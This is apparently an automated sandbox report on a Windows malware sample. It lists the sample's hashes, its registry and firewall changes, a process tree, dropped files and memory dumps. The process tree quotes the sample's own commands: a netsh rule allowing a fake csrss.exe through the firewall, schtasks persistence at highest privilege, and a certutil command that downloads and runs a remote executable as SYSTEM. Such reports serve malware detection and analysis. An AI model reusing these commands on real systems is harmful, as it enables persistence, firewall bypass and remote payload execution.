Analysis
- max time kernel: 80s
- max time network: 204s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 24-05-2022 01:22
Static task: static1
Behavioral task: behavioral1
Sample: 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
Resource: win7-20220414-en
General
- Target: 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
- Size: 3.8MB
- MD5: 2398437ccc44c1423def15077c7e0b87
- SHA1: f6d5d7c86644c30dde8321b73e1714fb1896efe1
- SHA256: 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01
- SHA512: 4982c3e50834aa01a1c80142cc70aa254e9323dfea01c8d140d7ada43d4e3b04dedded5fdb9e9a0c125a08210267d216cd7c48c26e5f1329c0afe24ea9ec698f
Malware Config
Signatures
- Modifies Windows Firewall (1 TTPs)
- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes (pid | process):
  - 2004 | bcdedit.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid | process):
  - 1956 | schtasks.exe
  - 1356 | schtasks.exe
- Modifies data under HKEY_USERS (17 IoCs)
  Processes (description | ioc | process):
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | netsh.exe
  - Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | netsh.exe
  - Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | netsh.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid | process):
  - 2012 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
  - 1172 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
  - Token: SeDebugPrivilege | 2012 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
  - Token: SeImpersonatePrivilege | 2012 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes (description | pid | process | target process):
  - PID 1172 wrote to memory of 1496 | 1172 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe | cmd.exe
  - PID 1172 wrote to memory of 1496 | 1172 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe | cmd.exe
  - PID 1172 wrote to memory of 1496 | 1172 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe | cmd.exe
  - PID 1172 wrote to memory of 1496 | 1172 | 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe | cmd.exe
  - PID 1496 wrote to memory of 1140 | 1496 | cmd.exe | netsh.exe
  - PID 1496 wrote to memory of 1140 | 1496 | cmd.exe | netsh.exe
  - PID 1496 wrote to memory of 1140 | 1496 | cmd.exe | netsh.exe
Processes (process tree; nesting shows parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        - Modifies data under HKEY_USERS
    - C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        - Creates scheduled task(s)
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      - C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        - Modifies boot configuration data using bcdedit
- C:\Windows\system32\makecab.exe
  Command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524032326.log C:\Windows\Logs\CBS\CbsPersist_20220524032326.cab
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 795KB
  MD5: 57886526408d918d2504af120438e2d3
  SHA1: 4f0bee6f65304ccbd6a02e496b3a8dda21f92113
  SHA256: ae5d22b49be7d31cfa2118f1ce758fcaa9bbaf47c7332345c3ee5f104bdb5be7
  SHA512: b305d001e96dd25d148fc6a82dee19cdd2845e8360cc67bd2a21679e8e8d623b38f405fcfe62f973c77620be51d957b52fa40fb96823a165b6fb684041d701af
- C:\Windows\rss\csrss.exe
  Filesize: 1.5MB
  MD5: 03ff8f3407b37a8738feb2a6d44023e0
  SHA1: f013118644391424d27d370f34a3588b16cd442d
  SHA256: 743bda3d297a05158986d3b65d9434f89247e2430f226d0a2c2f7c8ead9f2f50
  SHA512: 432f2be7cd67e1b240eb01e382f65361ffa68d39aaaa37a76fa7af620e5a66beba61b88d510ed0b27a472efc75fbcf72f92b95b142849271adc15398e5bd0171
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1007KB
  MD5: fee1361b94fc5e9534a5f29dec8390d0
  SHA1: 0f31dc67981c847b04bd89f0203244321aaec84d
  SHA256: 09869a001cd8b2af88e67435090a7d4d67c8d8809c49e0d47345fc0a5d029cf5
  SHA512: 7df763320913891766151205f5298df15aea0256d7123f5909626404f8f24a922caaa200126a959e69e819fe1378d00d983d536efde59be091ac46094d6796fb
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 926KB
  MD5: 4c1afc296029cc07b0b671623a4646d5
  SHA1: 4327258826ceed3bb71175b9f3149fddb644786d
  SHA256: 46f58250810e5affaa86a45b9e70e2b91db2e6e10c013df38939046cb9b9e08c
  SHA512: 9b73ccfe1468acb7ca2d33832f2d09e29e71529af627417284f52e9f62078dfed384cb149810fa068b60837b15dfb6bc770ab887ccef97d104567d4f39971d99
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 999KB
  MD5: f953111ce08297064a5a85e53680774e
  SHA1: c51d7ef2f14aab027c39ed41e17be18197be8b80
  SHA256: 756fd97d974a0d084ad201029a141c05929e84dd2ca52b9ac75a3e10d7e1999b
  SHA512: ea097e367c7e80afab0947c80772ee20a3d0959011877a41d1fca8bed29e933399c6a59d4154b4df98d4c073a79b89c2a84cfca032e078054587670afd58a69d
- \Users\Admin\AppData\Local\Temp\dbghelp.dll
  Filesize: 902KB
  MD5: 003454e0ce154f7707b47bc8bd8ca901
  SHA1: 751b3e6a0be4e973a5e3750dcf260e2d3ff85258
  SHA256: 2cd4170a79fb58fba1c72bdb1cfa4ee79dbbc15284be14c28549b6e85f604df3
  SHA512: b2091cfcdb795f84dddc938c44ea1dbe9fbe17a6275d37fdfd546fd0fae11bb3067470983c652c568d47bc4fb8d8f1920567f78ebcf7cba2439849bc61b00227
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 923KB
  MD5: 56ec65dca9e2cc458bd94d4d0a184d91
  SHA1: 1d2afff104337ee20e6244e81156b61e3dd6202c
  SHA256: bd2a9e2d148a86580bc158b2c283c18153344b3d808cf1f17f75f11382ba450e
  SHA512: 18d447609b2771718b633f9ff5af75ef7e68c1a38229d172fc858129cd4ffae85b276deb7bbb1bbe5b1c86f4ee047d7e0555b6a7b4c53538ab8793905278b794
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 1.0MB
  MD5: 9d75bb89e415a6e0c5255dad7e395ee7
  SHA1: 747e50b4ddf79aa77a305440e2b9f6a2d9c001d0
  SHA256: 2c84a9d343a7f953c205c5906579e63fc02ca03ebec7d639802bef90114f27ea
  SHA512: 1a6e5fa21c7fb7bb5b349d6e52f8b8265a773b722f0a7e098aa1b472996004987e3fe677a6fde1c72a56400558347060676461a0d2ae47759015fa86d3e0d252
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 923KB
  MD5: ad460861b380b9b79d6f31fe0b0c7135
  SHA1: d0750cb286597e1864829f81433214434ab0d653
  SHA256: f59ee6e28dc2a24769ef33f056d73b9a87f58861688e0b4753b9e17921bfe1f1
  SHA512: 990a1083b9e153ec274bbcf59ea07106d0a29399262a58062e6662488b0f552be30af1949df0574d3d6b29d0a731249110cc8ab3e05ffb4df47471310b0e476d
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 568KB
  MD5: d8f361a365a5add07a58e0a74b65ddbc
  SHA1: 32bbe3f2646e123bf32349537866e976884aced1
  SHA256: 8e6b2343e9f1156c93129def93326d2c4ad248f134722ec8179fbdac489313ef
  SHA512: a08071e2a4ad2c2a87ee17df3cc693c921bfc14b76ba56e805be00e717ed7d019a2e7db4216c78fda2de299706b64020a28a1df28a783be42c968b0bf5e9bab3
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 591KB
  MD5: e2f68dc7fbd6e0bf031ca3809a739346
  SHA1: 9c35494898e65c8a62887f28e04c0359ab6f63f5
  SHA256: b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
  SHA512: 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 591KB
  MD5: e2f68dc7fbd6e0bf031ca3809a739346
  SHA1: 9c35494898e65c8a62887f28e04c0359ab6f63f5
  SHA256: b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
  SHA512: 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
- \Users\Admin\AppData\Local\Temp\symsrv.dll
  Filesize: 163KB
  MD5: 5c399d34d8dc01741269ff1f1aca7554
  SHA1: e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
  SHA256: e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
  SHA512: 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
- \Windows\rss\csrss.exe
  Filesize: 1.2MB
  MD5: 790ad2db8365c5a6c221c296452e1b5a
  SHA1: 91617ef70e86fb44c8bf2fc56d4313fa08400767
  SHA256: 95f3527645db675b9632fefb2ad1f927021a9bbcada929eafefd1d98680f503c
  SHA512: a7d1134f9f836b13400805c7a289b90c98581d68dce73263c6dbc58ee2a5a8e1ae0e13d9e1a3fa5b669ef0063104c0a8ba45fab6afde402cb7f7f3a7f9f43e44
- \Windows\rss\csrss.exe
  Filesize: 1.4MB
  MD5: e7c18e3437e3cc005c76f2758f4c546e
  SHA1: 2accb610956b34604afd06539a3ee0013859bb2a
  SHA256: 9d2389038371e308a10521366d5f2d97947ef9e1815db66f2d58e871767ed39a
  SHA512: d8b270d58632899f1c34ec62a64cf8d9649865447aa4fa60888fef7997d10be2d06b4fbdd4a9d4b89c93939dc91332e790219a85525e7d0d0e7b0b80df7c1926
Memory dumps
- memory/1140-63-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp (Filesize: 8KB)
- memory/1140-62-0x0000000000000000-mapping.dmp
- memory/1172-60-0x0000000000400000-0x000000000313E000-memory.dmp (Filesize: 45.2MB)
- memory/1172-59-0x00000000036A0000-0x0000000003A46000-memory.dmp (Filesize: 3.6MB)
- memory/1172-58-0x00000000036A0000-0x0000000003A46000-memory.dmp (Filesize: 3.6MB)
- memory/1204-68-0x0000000003380000-0x0000000003726000-memory.dmp (Filesize: 3.6MB)
- memory/1204-70-0x0000000000400000-0x000000000313E000-memory.dmp (Filesize: 45.2MB)
- memory/1204-69-0x0000000003380000-0x0000000003726000-memory.dmp (Filesize: 3.6MB)
- memory/1204-66-0x0000000000000000-mapping.dmp
- memory/1496-61-0x0000000000000000-mapping.dmp
- memory/2004-84-0x0000000000000000-mapping.dmp
- memory/2012-54-0x0000000003400000-0x00000000037A6000-memory.dmp (Filesize: 3.6MB)
- memory/2012-57-0x0000000000400000-0x000000000313E000-memory.dmp (Filesize: 45.2MB)
- memory/2012-56-0x00000000037B0000-0x0000000003EA5000-memory.dmp (Filesize: 7.0MB)
- memory/2012-55-0x0000000003400000-0x00000000037A6000-memory.dmp (Filesize: 3.6MB)